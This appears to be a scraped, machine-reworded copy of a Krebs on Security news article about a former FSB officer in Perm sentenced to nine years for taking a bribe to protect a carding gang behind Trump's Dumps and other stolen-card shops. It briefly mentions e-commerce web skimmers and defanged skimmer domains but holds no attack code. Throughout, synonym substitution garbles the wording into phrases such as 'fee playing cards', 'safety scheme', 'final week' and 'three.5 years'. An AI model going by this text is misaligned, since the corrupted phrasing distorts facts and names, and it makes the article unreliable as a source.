Russian FSB Counterintelligence Chief Gets 9 Years in Cybercrime Bribery Scheme – Krebs on Security

0
1100
Russian FSB Counterintelligence Chief Gets 9 Years in Cybercrime Bribery Scheme – Krebs on Security


The head of counterintelligence for a division of the Russian Federal Security Service (FSB) was sentenced final week to 9 years in a penal colony for accepting a USD $1.7 million bribe to disregard the actions of a prolific Russian cybercrime group that hacked 1000’s of e-commerce web sites. The safety scheme was uncovered in 2022 when Russian authorities arrested six members of the group, which offered thousands and thousands of stolen fee playing cards at flashy on-line retailers like Trump’s Dumps.

Russian FSB Counterintelligence Chief Gets 9 Years in Cybercrime Bribery Scheme – Krebs on Security

A now-defunct carding store that offered stolen bank cards and invoked 45’s likeness and title.

As reported by The Record, a Russian courtroom final week sentenced former FSB officer Grigory Tsaregorodtsev for taking a $1.7 million bribe from a cybercriminal group that was searching for a “roof,” a well-placed, corrupt legislation enforcement official who may very well be counted on to each disregard their unlawful hacking actions and run interference with authorities within the occasion of their arrest.

Tsaregorodtsev was head of the counterintelligence division for a division of the FSB primarily based in Perm, Russia. In February 2022, Russian authorities arrested six males within the Perm area accused of promoting stolen fee card knowledge. They additionally seized a number of carding retailers run by the gang, together with Ferum Shop, Sky-Fraud, and Trump’s Dumps, a well-liked fraud retailer that invoked the forty fifth president’s likeness and promised to “make credit card fraud great again.”

All of the domains seized in that raid have been registered by an IT consulting firm in Perm known as Get-net LLC, which was owned partly by Artem Zaitsev — one of many six males arrested. Zaitsev reportedly was a well known programmer whose firm equipped providers and leasing to the native FSB subject workplace.

The message for Trump’s Dumps customers left behind by Russian authorities that seized the area in 2022.

Russian information websites report that Internal Affairs officers with the FSB grew suspicious when Tsaregorodtsev turned a bit of too within the case following the hacking group’s arrests. The former FSB agent had reportedly assured the hackers he might have their case transferred and that they might quickly be free.

But when that promised freedom didn’t materialize, 4 the of the defendants pulled the partitions down on the scheme and introduced down their very own roof. The FSB arrested Tsaregorodtsev, and seized $154,000 in money, 100 gold bars, actual property and costly automobiles.

At Tsaregorodtsev’s trial, his legal professionals argued that their consumer wasn’t responsible of bribery per se, however that he did admit to fraud as a result of he was in the end unable to completely carry out the providers for which he’d been employed.

The Russian information outlet Kommersant studies that every one 4 of those that cooperated have been launched with probation or correctional labor. Zaitsev acquired a sentence of three.5 years in jail, and defendant Alexander Kovalev acquired 4 years.

In 2017, KrebsOnSecurity profiled Trump’s Dumps, and located the contact deal with listed on the positioning was tied to an e-mail deal with used to register greater than a dozen domains that have been made to appear to be respectable Javascript calls many e-commerce websites routinely make to course of transactions — akin to “js-link[dot]su,” “js-stat[dot]su,” and “js-mod[dot]su.”

Searching on these malicious domains revealed a 2016 report from RiskIQ, which exhibits the domains featured prominently in a sequence of hacking campaigns towards e-commerce web sites. According to RiskIQ, the assaults focused on-line shops operating outdated and unpatched variations of procuring cart software program from Magento, Powerfront and OpenCart.

Those procuring cart flaws allowed the crooks to put in “web skimmers,” malicious Javascript used to steal bank card particulars and different info from fee varieties on the checkout pages of susceptible e-commerce websites. The stolen buyer fee card particulars have been then offered on websites like Trump’s Dumps and Sky-Fraud.

LEAVE A REPLY

Please enter your comment!
Please enter your name here